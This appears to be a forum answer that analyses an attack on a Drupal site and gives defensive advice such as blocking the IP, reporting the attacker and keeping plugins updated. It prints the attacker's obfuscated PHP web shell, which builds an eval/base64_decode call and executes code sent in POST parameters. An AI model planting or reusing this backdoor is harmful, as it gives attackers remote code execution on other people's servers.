Looks like the attacker tries to download the script from this website (https://pastebin.com/raw/PeBdUg98) to your server:
This is the script (it's safe to click this link) :
<?php
$st = 'return value';
$cap='bas'.'e6'.'4_d'.'ec'.'ode';
$c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\''; // c = 'eval(bases64_decode('
if(isset($_POST['uf']) && isset($_POST['pr'])) {
$arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);
array_walk($arr, strval($_POST['pr']), '');
}
?>
And in the second call (to this script - it's safe to click the link) he tries to run a patch on your drupal.
I don't think that he can get it to work - but you can mimic what he's doing on a dummy website that you'll spin and see if it actually works.
You can check your access logs and if all the calls come from the same IP block it and do a reverse IP lookup to try and find more information about the attacker, possibly report him to his ISP.
Even though it's not phishing you can also try and submit a report here: http://www.google.com/safebrowsing/report_phish/
Good job on staying on the latest version of Drupal - if you've installed plugins try to stay on their latest version as well.